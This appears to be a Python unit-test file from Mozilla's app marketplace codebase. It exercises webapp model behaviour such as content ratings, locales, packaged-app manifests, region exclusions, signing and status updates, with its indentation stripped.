ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
free_upgrade = ALL - set([amo.ADDON_FREE])
free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
# Checking ADDON_FREE changes.
app.premium_type = amo.ADDON_FREE
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_upgrade)
# Checking ADDON_FREE_INAPP changes.
app.premium_type = amo.ADDON_FREE_INAPP
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_inapp_upgrade)
# All else is false.
for pt_old in ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP]):
app.premium_type = pt_old
for pt_new in ALL:
eq_(app.is_premium_type_upgrade(pt_new), False)
@raises(ValueError)
def test_parse_domain(self):
Webapp(is_packaged=True).parsed_app_domain
def test_app_type_hosted(self):
eq_(Webapp().app_type, 'hosted')
def test_app_type_packaged(self):
eq_(Webapp(is_packaged=True).app_type, 'packaged')
@mock.patch('versions.models.Version.is_privileged', True)
def test_app_type_privileged(self):
# Have to use `app_factory` because we need a `latest_version`
# to make it a privileged version.
eq_(app_factory(is_packaged=True).app_type, 'privileged')
def test_nomination_new(self):
app = app_factory()
app.update(status=amo.STATUS_NULL)
app.versions.latest().update(nomination=None)
app.update(status=amo.STATUS_PENDING)
assert app.versions.latest().nomination
def test_nomination_rejected(self):
app = app_factory()
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().update(nomination=self.days_ago(1))
app.update(status=amo.STATUS_PENDING)
self.assertCloseToNow(app.versions.latest().nomination)
def test_nomination_pkg_pending_new_version(self):
# New versions while pending inherit version nomination.
app = app_factory()
app.update(status=amo.STATUS_PENDING, is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PENDING)
v = Version.objects.create(addon=app, version='1.9')
eq_(v.nomination, old_ver.nomination)
def test_nomination_pkg_public_new_version(self):
# New versions while public get a new version nomination.
app = app_factory()
app.update(is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_nomination_public_waiting(self):
# New versions while public waiting get a new version nomination.
app = app_factory()
app.update(is_packaged=True, status=amo.STATUS_PUBLIC_WAITING)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PUBLIC_WAITING)
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_excluded_in(self):
app1 = app_factory()
region = mkt.regions.BR
AddonExcludedRegion.objects.create(addon=app1, region=region.id)
eq_(get_excluded_in(region.id), [app1.id])
def test_supported_locale_property(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,fr', _signal=False)
app.reload()
eq_(app.supported_locales,
(u'English (US)', [u'Deutsch', u'Fran\xe7ais']))
def test_supported_locale_property_empty(self):
app = app_factory()
eq_(app.supported_locales, (u'English (US)', []))
def test_supported_locale_property_bad(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,xx', _signal=False)
app.reload()
eq_(app.supported_locales, (u'English (US)', [u'Deutsch']))
def test_supported_locale_app_rejected(self):
"""
Simulate an app being rejected, which sets the
app.current_version to None, and verify supported_locales works
as expected -- which is that if there is no current version we
can't report supported_locales for it, so we return an empty
list.
"""
app = app_factory()
app.versions.latest().update(supported_locales='de', _signal=False)
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().all_files[0].update(status=amo.STATUS_REJECTED)
app.update_version()
app.reload()
eq_(app.supported_locales, (u'English (US)', []))
def test_get_trending(self):
# Test no trending record returns zero.
app = app_factory()
eq_(app.get_trending(), 0)
# Add a region specific trending and test the global one is returned
# because the region is not mature.
region = mkt.regions.REGIONS_DICT['me']
app.trending.create(value=20.0, region=0)
app.trending.create(value=10.0, region=region.id)
eq_(app.get_trending(region=region), 20.0)
# Now test the regional trending is returned when adolescent=False.
region.adolescent = False
eq_(app.get_trending(region=region), 10.0)
def test_rated(self):
self.create_switch('iarc')
assert app_factory(rated=True).is_rated()
assert not app_factory().is_rated()
def test_set_content_ratings(self):
rb = mkt.ratingsbodies
app = app_factory()
app.set_content_ratings({})
assert not app.is_rated()
# Create.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_L,
rb.PEGI: rb.PEGI_3,
})
eq_(ContentRating.objects.count(), 2)
for expected in [(rb.CLASSIND.id, rb.CLASSIND_L.id),
(rb.PEGI.id, rb.PEGI_3.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
# Update.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_10,
rb.PEGI: rb.PEGI_3,
rb.GENERIC: rb.GENERIC_18,
})
eq_(ContentRating.objects.count(), 3)
for expected in [(rb.CLASSIND.id, rb.CLASSIND_10.id),
(rb.PEGI.id, rb.PEGI_3.id),
(rb.GENERIC.id, rb.GENERIC_18.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
def test_set_descriptors(self):
app = app_factory()
eq_(RatingDescriptors.objects.count(), 0)
app.set_descriptors([])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert not descriptors.has_classind_drugs
assert not descriptors.has_esrb_blood # Blood-deuh!
# Create.
app.set_descriptors([
'has_classind_drugs', 'has_pegi_scary', 'has_generic_drug_ref'
])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_classind_drugs
assert descriptors.has_pegi_scary
assert descriptors.has_generic_drug_ref
assert not descriptors.has_esrb_blood
# Update.
app.set_descriptors([
'has_esrb_blood', 'has_classind_drugs'
])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_esrb_blood
assert descriptors.has_classind_drugs
assert not descriptors.has_pegi_scary
assert not descriptors.has_generic_drug_ref
def test_set_interactives(self):
app = app_factory()
app.set_interactives([])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert not app_interactives.has_digital_purchases
# Create.
app.set_interactives([
'has_shares_info', 'has_digital_PurChaSes', 'has_UWOTM8'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert app_interactives.has_shares_info
assert app_interactives.has_digital_purchases
assert not app_interactives.has_users_interact
# Update.
app.set_interactives([
'has_digital_content_portaL', 'has_digital_purchases',
'has_shares_ur_mum'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert app_interactives.has_digital_content_portal
assert app_interactives.has_digital_purchases
@mock.patch('lib.iarc.client.MockClient.call')
@mock.patch('mkt.webapps.models.render_xml')
def test_set_iarc_storefront_data(self, render_mock, storefront_mock):
# Set up ratings/descriptors/interactives.
self.create_switch('iarc')
app = app_factory(name='LOL')
app.set_iarc_info(submission_id='1234', security_code='sektor')
app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
app.set_interactives(['has_users_interact', 'has_shares_info'])
app.set_content_ratings({
mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_A,
mkt.ratingsbodies.PEGI: mkt.ratingsbodies.PEGI_3,
})
# Check the client was called.
app.set_iarc_storefront_data()
assert storefront_mock.called
eq_(render_mock.call_count, 2)
eq_(render_mock.call_args_list[0][0][0], 'set_storefront_data.xml')
# Check arguments to the XML template are all correct.
data = render_mock.call_args_list[0][0][1]
eq_(type(data['title']), unicode)
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating'], 'Adults Only')
eq_(data['title'], 'LOL')
eq_(data['rating_system'], 'ESRB')
eq_(data['descriptors'], 'Blood')
self.assertSetEqual(data['interactive_elements'].split(', '),
['Shares Info', 'Users Interact'])
data = render_mock.call_args_list[1][0][1]
eq_(type(data['title']), unicode)
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating'], '3+')
eq_(data['title'], 'LOL')
eq_(data['rating_system'], 'PEGI')
eq_(data['descriptors'], 'Fear')
def test_has_payment_account(self):
app = app_factory()
assert not app.has_payment_account()
user = UserProfile.objects.create(email='a', username='b')
payment = PaymentAccount.objects.create(
solitude_seller=SolitudeSeller.objects.create(user=user),
user=user)
AddonPaymentAccount.objects.create(addon=app, payment_account=payment)
assert app.has_payment_account()
@override_settings(SECRET_KEY='test')
def test_iarc_token(self):
app = Webapp()
app.id = 1
eq_(app.iarc_token(),
hashlib.sha512(settings.SECRET_KEY + str(app.id)).hexdigest())
class DeletedAppTests(amo.tests.ESTestCase):
def test_soft_deleted_no_current_version(self):
webapp = amo.tests.app_factory()
webapp._current_version = None
webapp.save()
webapp.delete()
eq_(webapp.current_version, None)
def test_soft_deleted_no_latest_version(self):
webapp = amo.tests.app_factory()
webapp._latest_version = None
webapp.save()
webapp.delete()
eq_(webapp.latest_version, None)
class TestExclusions(amo.tests.TestCase):
fixtures = fixture('prices')
def setUp(self):
self.app = Webapp.objects.create(premium_type=amo.ADDON_PREMIUM)
self.app.addonexcludedregion.create(region=mkt.regions.US.id)
def make_tier(self):
self.price = Price.objects.get(pk=1)
AddonPremium.objects.create(addon=self.app, price=self.price)
def test_not_premium(self):
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium(self):
self.make_tier()
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium_remove_tier(self):
self.make_tier()
(self.price.pricecurrency_set
.filter(region=mkt.regions.PL.id).update(paid=False))
ok_(mkt.regions.PL.id in self.app.get_excluded_region_ids())
class TestPackagedAppManifestUpdates(amo.tests.TestCase):
# Note: More extensive tests for `Addon.update_names` are in the Addon
# model tests.
fixtures = ['base/platforms']
def setUp(self):
self.webapp = amo.tests.app_factory(is_packaged=True,
default_locale='en-US')
self.webapp.name = {'en-US': 'Packaged App'}
self.webapp.save()
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_name_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo'}
self.trans_eq(self.webapp.name, 'en-US', 'Packaged App')
self.webapp.update_name_from_package_manifest()
self.webapp = Webapp.objects.get(pk=self.webapp.pk)
self.trans_eq(self.webapp.name, 'en-US', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_locale_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo', 'default_locale': 'fr'}
eq_(self.webapp.default_locale, 'en-US')
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.default_locale, 'fr')
self.trans_eq(self.webapp.name, 'en-US', None)
self.trans_eq(self.webapp.name, 'fr', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_locales_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo',
'locales': {'es': {'name': 'es'},
'de': {'name': 'de'}}}
self.webapp.update_supported_locales()
eq_(self.webapp.current_version.supported_locales, 'de,es')
def test_update_name_from_package_manifest_version(self):
evil_manifest = {
'name': u'Evil App Name'
}
good_manifest = {
'name': u'Good App Name',
}
latest_version = version_factory(addon=self.webapp, version='2.3',
file_kw=dict(status=amo.STATUS_DISABLED))
current_version = self.webapp.current_version
AppManifest.objects.create(version=current_version,
manifest=json.dumps(good_manifest))
AppManifest.objects.create(version=latest_version,
manifest=json.dumps(evil_manifest))
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.name, u'Good App Name')
class TestWebappVersion(amo.tests.TestCase):
fixtures = ['base/platforms']
def test_no_version(self):
eq_(Webapp().get_latest_file(), None)
def test_no_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
webapp._current_version = Version.objects.create(addon=webapp)
eq_(webapp.get_latest_file(), None)
def test_right_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
version = Version.objects.create(addon=webapp)
old_file = File.objects.create(version=version, platform_id=1)
old_file.update(created=datetime.now() - timedelta(days=1))
new_file = File.objects.create(version=version, platform_id=1)
webapp._current_version = version
eq_(webapp.get_latest_file().pk, new_file.pk)
class TestWebappManager(amo.tests.TestCase):
def setUp(self):
self.reviewed_eq = (lambda f=[]:
eq_(list(Webapp.objects.reviewed()), f))
self.listed_eq = (lambda f=[]: eq_(list(Webapp.objects.visible()), f))
def test_reviewed(self):
for status in amo.REVIEWED_STATUSES:
w = Webapp.objects.create(status=status)
self.reviewed_eq([w])
Webapp.objects.all().delete()
def test_unreviewed(self):
for status in amo.UNREVIEWED_STATUSES:
Webapp.objects.create(status=status)
self.reviewed_eq()
Webapp.objects.all().delete()
def test_listed(self):
# Public status, non-null current version, non-user-disabled.
w = app_factory(status=amo.STATUS_PUBLIC)
self.listed_eq([w])
def test_unlisted(self):
# Public, null current version, non-user-disabled.
w = Webapp.objects.create()
self.listed_eq()
# With current version but unreviewed.
Version.objects.create(addon=w)
self.listed_eq()
# And user-disabled.
w.update(disabled_by_user=True)
self.listed_eq()
def test_by_identifier(self):
w = Webapp.objects.create(app_slug='foo')
eq_(Webapp.objects.by_identifier(w.id), w)
eq_(Webapp.objects.by_identifier(str(w.id)), w)
eq_(Webapp.objects.by_identifier(w.app_slug), w)
with self.assertRaises(Webapp.DoesNotExist):
Webapp.objects.by_identifier('fake')
def test_rated(self):
self.create_switch('iarc')
rated = app_factory(rated=True)
app_factory()
eq_(Webapp.objects.count(), 2)
eq_(list(Webapp.objects.rated()), [rated])
class TestManifest(BaseWebAppTest):
def test_get_manifest_json(self):
webapp = self.post_addon()
assert webapp.current_version
assert webapp.current_version.has_files
with open(self.manifest, 'r') as mf:
manifest_json = json.load(mf)
eq_(webapp.get_manifest_json(), manifest_json)
class PackagedFilesMixin(amo.tests.AMOPaths):
def setUp(self):
self.package = self.packaged_app_path('mozball.zip')
def setup_files(self, filename='mozball.zip'):
# This assumes self.file exists.
if not storage.exists(self.file.file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path(filename),
self.file.file_path)
class TestPackagedModel(amo.tests.TestCase):
@mock.patch.object(settings, 'SITE_URL', 'http://hy.fr')
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
def test_create_blocklisted_version(self):
app = app_factory(name=u'Mozillaball ょ', app_slug='test',
is_packaged=True, version_kw={'version': '1.0',
'created': None})
app.create_blocklisted_version()
app = app.reload()
v = app.versions.latest()
f = v.files.latest()
eq_(app.status, amo.STATUS_BLOCKED)
eq_(app.versions.count(), 2)
eq_(v.version, 'blocklisted-1.0')
eq_(app._current_version, v)
assert 'blocklisted-1.0' in f.filename
eq_(f.status, amo.STATUS_BLOCKED)
# Check manifest.
url = app.get_manifest_url()
res = self.client.get(url)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
assert 'etag' in res._headers
data = json.loads(res.content)
eq_(data['name'], 'Blocked by Mozilla')
eq_(data['version'], 'blocklisted-1.0')
eq_(data['package_path'], 'http://hy.fr/downloads/file/%s/%s' % (
f.id, f.filename))
class TestPackagedManifest(BasePackagedAppTest):
def _get_manifest_json(self):
zf = zipfile.ZipFile(self.package)
data = zf.open('manifest.webapp').read()
zf.close()
return json.loads(data)
def test_get_manifest_json(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_w_file(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
file_ = webapp.current_version.all_files[0]
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(file_), mf)
def test_get_manifest_json_multiple_versions(self):
# Post the real app/version, but backfill an older version.
webapp = self.post_addon()
webapp.update(status=amo.STATUS_PUBLIC, _current_version=None)
version = version_factory(addon=webapp, version='0.5',
created=self.days_ago(1))
version.files.update(created=self.days_ago(1))
webapp = Webapp.objects.get(pk=webapp.pk)
webapp.update_version()
assert webapp.current_version
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_multiple_version_disabled(self):
# Post an app, then emulate a reviewer reject and add a new, pending
# version.
webapp = self.post_addon()
webapp.latest_version.files.update(status=amo.STATUS_DISABLED)
webapp.latest_version.update(created=self.days_ago(1))
webapp.update(status=amo.STATUS_REJECTED, _current_version=None)
version = version_factory(addon=webapp, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
mf = self._get_manifest_json()
AppManifest.objects.create(version=version,
manifest=json.dumps(mf))
webapp.update_version()
webapp = webapp.reload()
eq_(webapp.latest_version, version)
self.file = version.all_files[0]
self.setup_files()
eq_(webapp.get_manifest_json(), mf)
def test_cached_manifest_is_cached(self):
webapp = self.post_addon()
# First call does queries and caches results.
webapp.get_cached_manifest()
# Subsequent calls are cached.
with self.assertNumQueries(0):
webapp.get_cached_manifest()
def test_cached_manifest_contents(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
self.file = version.all_files[0]
self.setup_files()
manifest = self._get_manifest_json()
data = json.loads(webapp.get_cached_manifest())
eq_(data['name'], webapp.name)
eq_(data['version'], webapp.current_version.version)
eq_(data['size'], self.file.size)
eq_(data['release_notes'], version.releasenotes)
eq_(data['package_path'], absolutify(
os.path.join(reverse('downloads.file', args=[self.file.id]),
self.file.filename)))
eq_(data['developer'], manifest['developer'])
eq_(data['icons'], manifest['icons'])
eq_(data['locales'], manifest['locales'])
@mock.patch.object(packaged, 'sign', mock_sign)
def test_package_path(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
file = version.all_files[0]
res = self.client.get(file.get_url_path('manifest'))
eq_(res.status_code, 200)
eq_(res['content-type'], 'application/zip')
def test_packaged_with_BOM(self):
# Exercise separate code paths to loading the packaged app manifest.
self.setup_files('mozBOM.zip')
assert WebAppParser().parse(self.file.file_path)
self.assertTrue(self.app.has_icon_in_manifest())
class TestDomainFromURL(unittest.TestCase):
def test_simple(self):
eq_(Webapp.domain_from_url('http://mozilla.com/'),
'http://mozilla.com')
def test_long_path(self):
eq_(Webapp.domain_from_url('http://mozilla.com/super/rad.webapp'),
'http://mozilla.com')
def test_no_normalize_www(self):
eq_(Webapp.domain_from_url('http://www.mozilla.com/super/rad.webapp'),
'http://www.mozilla.com')
def test_with_port(self):
eq_(Webapp.domain_from_url('http://mozilla.com:9000/'),
'http://mozilla.com:9000')
def test_subdomains(self):
eq_(Webapp.domain_from_url('http://apps.mozilla.com/'),
'http://apps.mozilla.com')
def test_https(self):
eq_(Webapp.domain_from_url('https://mozilla.com/'),
'https://mozilla.com')
def test_normalize_case(self):
eq_(Webapp.domain_from_url('httP://mOzIllA.com/'),
'http://mozilla.com')
@raises(ValueError)
def test_none(self):
Webapp.domain_from_url(None)
@raises(ValueError)
def test_empty(self):
Webapp.domain_from_url('')
def test_empty_or_none(self):
eq_(Webapp.domain_from_url(None, allow_none=True), None)
class TestTransformer(amo.tests.TestCase):
fixtures = ['webapps/337141-steamcube']
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
@mock.patch('mkt.webapps.models.Addon.transformer')
def test_addon_transformer_called(self, transformer):
transformer.return_value = {}
list(Webapp.objects.all())
assert transformer.called
def test_device_types(self):
AddonDeviceType.objects.create(addon_id=337141,
device_type=self.device)
webapps = list(Webapp.objects.filter(id=337141))
with self.assertNumQueries(0):
for webapp in webapps:
assert webapp._device_types
eq_(webapp.device_types, [DEVICE_TYPES[self.device]])
def test_device_type_cache(self):
webapp = Webapp.objects.get(id=337141)
webapp._device_types = []
with self.assertNumQueries(0):
eq_(webapp.device_types, [])
class TestIsComplete(amo.tests.TestCase):
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
self.cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
self.webapp = Webapp.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_NULL)
def fail(self, value):
can, reasons = self.webapp.is_complete()
eq_(can, False)
assert value in reasons[0], reasons
def test_fail(self):
self.fail('email')
self.webapp.support_email = 'a@a.com'
self.webapp.save()
self.fail('name')
self.webapp.name = 'name'
self.webapp.save()
self.fail('device')
self.webapp.addondevicetype_set.create(device_type=self.device)
self.webapp.save()
self.fail('category')
AddonCategory.objects.create(addon=self.webapp, category=self.cat)
self.fail('screenshot')
self.webapp.previews.create()
eq_(self.webapp.is_complete()[0], True)
class TestAddonExcludedRegion(amo.tests.WebappTestCase):
def setUp(self):
super(TestAddonExcludedRegion, self).setUp()
self.excluded = self.app.addonexcludedregion
eq_(list(self.excluded.values_list('id', flat=True)), [])
self.er = self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
eq_(list(self.excluded.values_list('id', flat=True)), [self.er.id])
def test_exclude_multiple(self):
other = AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
self.assertSetEqual(self.excluded.values_list('id', flat=True),
[self.er.id, other.id])
def test_remove_excluded(self):
self.er.delete()
eq_(list(self.excluded.values_list('id', flat=True)), [])
def test_get_region(self):
eq_(self.er.get_region(), mkt.regions.UK)
def test_unicode(self):
eq_(unicode(self.er), '%s: %s' % (self.app, mkt.regions.UK.slug))
class TestContentRating(amo.tests.WebappTestCase):
def setUp(self):
self.app = self.get_app()
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
@mock.patch.object(mkt.regions.US, 'ratingsbodies',
(mkt.ratingsbodies.ESRB,))
@mock.patch.object(mkt.regions.VE, 'ratingsbodies',
(mkt.ratingsbodies.GENERIC,))
def test_get_regions_and_slugs(self):
classind_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
regions = classind_rating.get_regions()
assert mkt.regions.BR in regions
assert mkt.regions.US not in regions
assert mkt.regions.VE not in regions
slugs = classind_rating.get_region_slugs()
assert mkt.regions.BR.slug in slugs
assert mkt.regions.US.slug not in slugs
assert mkt.regions.VE.slug not in slugs
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
@mock.patch.object(mkt.regions.DE, 'ratingsbodies',
(mkt.ratingsbodies.ESRB,))
@mock.patch.object(mkt.regions.VE, 'ratingsbodies',
(mkt.ratingsbodies.GENERIC,))
def test_get_regions_and_slugs_generic_fallback(self):
gen_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
regions = gen_rating.get_regions()
assert mkt.regions.BR not in regions
assert mkt.regions.DE not in regions
assert mkt.regions.VE in regions
slugs = gen_rating.get_region_slugs()
assert mkt.regions.BR.slug not in slugs
assert mkt.regions.DE.slug not in slugs
assert mkt.regions.VE.slug not in slugs
        # We have a catch-all 'generic' region for all regions without a rating body.
assert mkt.regions.GENERIC_RATING_REGION_SLUG in slugs
@mock.patch.object(mkt.ratingsbodies.CLASSIND, 'name', 'CLASSIND')
@mock.patch.object(mkt.ratingsbodies.CLASSIND_10, 'name', '10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'name', 'Everybody 10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'slug', '10')
def test_get_ratings(self):
# Infer the slug from the name.
cr = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=mkt.ratingsbodies.CLASSIND_10.id)
eq_(cr.get_rating().slug, '10')
eq_(cr.get_body().slug, 'classind')
# When already has slug set.
eq_(ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.ESRB.id,
rating=mkt.ratingsbodies.ESRB_E.id).get_rating().slug,
'10')
class TestContentRatingsIn(amo.tests.WebappTestCase):
def test_not_in_region(self):
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region), [])
for region in mkt.regions.ALL_REGIONS:
AddonExcludedRegion.objects.create(addon=self.app,
region=region.id)
eq_(self.get_app().content_ratings_in(region=region), [])
def test_in_for_region_and_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
def test_in_region_and_category(self):
self.make_game()
cat = Category.objects.get(slug='games')
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.listed_in(region=region, category='games'), True)
eq_(self.app.listed_in(region=region, category=cat),
True)
def test_in_region_and_not_in_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
@mock.patch.object(mkt.regions.CO, 'ratingsbodies', ())
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
def test_generic_fallback(self):
# Test region with no rating body returns generic content rating.
crs = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=mkt.ratingsbodies.GENERIC_3.id)
eq_(self.app.content_ratings_in(region=mkt.regions.CO), [crs])
# Test region with rating body does not include generic content rating.
assert crs not in self.app.content_ratings_in(region=mkt.regions.BR)
class TestIARCInfo(amo.tests.WebappTestCase):
def test_no_info(self):
with self.assertRaises(IARCInfo.DoesNotExist):
self.app.iarc_info
def test_info(self):
IARCInfo.objects.create(addon=self.app, submission_id=1,
security_code='s3kr3t')
eq_(self.app.iarc_info.submission_id, 1)
eq_(self.app.iarc_info.security_code, 's3kr3t')
class TestQueue(amo.tests.WebappTestCase):
def test_in_queue(self):
assert not self.app.in_rereview_queue()
RereviewQueue.objects.create(addon=self.app)
assert self.app.in_rereview_queue()
class TestPackagedSigning(amo.tests.WebappTestCase):
@mock.patch('lib.crypto.packaged.sign')
def test_not_packaged(self, sign):
self.app.update(is_packaged=False)
assert not self.app.sign_if_packaged(self.app.current_version.pk)
assert not sign.called
@mock.patch('lib.crypto.packaged.sign')
def test_packaged(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk)
eq_(sign.call_args[0][0], self.app.current_version.pk)
@mock.patch('lib.crypto.packaged.sign')
def test_packaged_reviewer(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk,
reviewer=True)
eq_(sign.call_args[0][0], self.app.current_version.pk)
eq_(sign.call_args[1]['reviewer'], True)
class TestUpdateStatus(amo.tests.TestCase):
def setUp(self):
# Disabling signals to simplify these tests and because create doesn't
# call the signals anyway.
version_changed_signal.disconnect(version_changed,
dispatch_uid='version_changed')
post_save.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
def tearDown(self):
version_changed_signal.connect(version_changed,
dispatch_uid='version_changed')
post_save.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
def test_no_versions(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_version_no_files(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Version(addon=app).save()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_only_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_other_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
amo.tests.version_factory(addon=app)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_REJECTED)
def test_one_version_pending(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
file_kw=dict(status=amo.STATUS_DISABLED))
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
app.update_status()
eq_(app.status, amo.STATUS_PENDING)
def test_one_version_public(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_DISABLED))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC)
def test_was_public_waiting_then_new_version(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC_WAITING)
File.objects.filter(version__addon=app).update(status=app.status)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
def test_blocklisted(self):
app = amo.tests.app_factory(status=amo.STATUS_BLOCKED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_BLOCKED)
class TestInstalled(amo.tests.TestCase):
def setUp(self):
user = UserProfile.objects.create(email='f@f.com')
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
self.m = functools.partial(Installed.objects.safer_get_or_create,
user=user, addon=app)
def test_install_type(self):
assert self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert not self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert self.m(install_type=apps.INSTALL_TYPE_REVIEWER)[1]
class TestAppFeatures(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestAppFeatures, self).setUp()
self.create_switch('buchets')
self.model = AppFeatures
self.related_name = 'features'
self.BOOL_DICT = mkt.constants.features.APP_FEATURES
self.flags = ('APPS', 'GEOLOCATION', 'PAY', 'SMS')
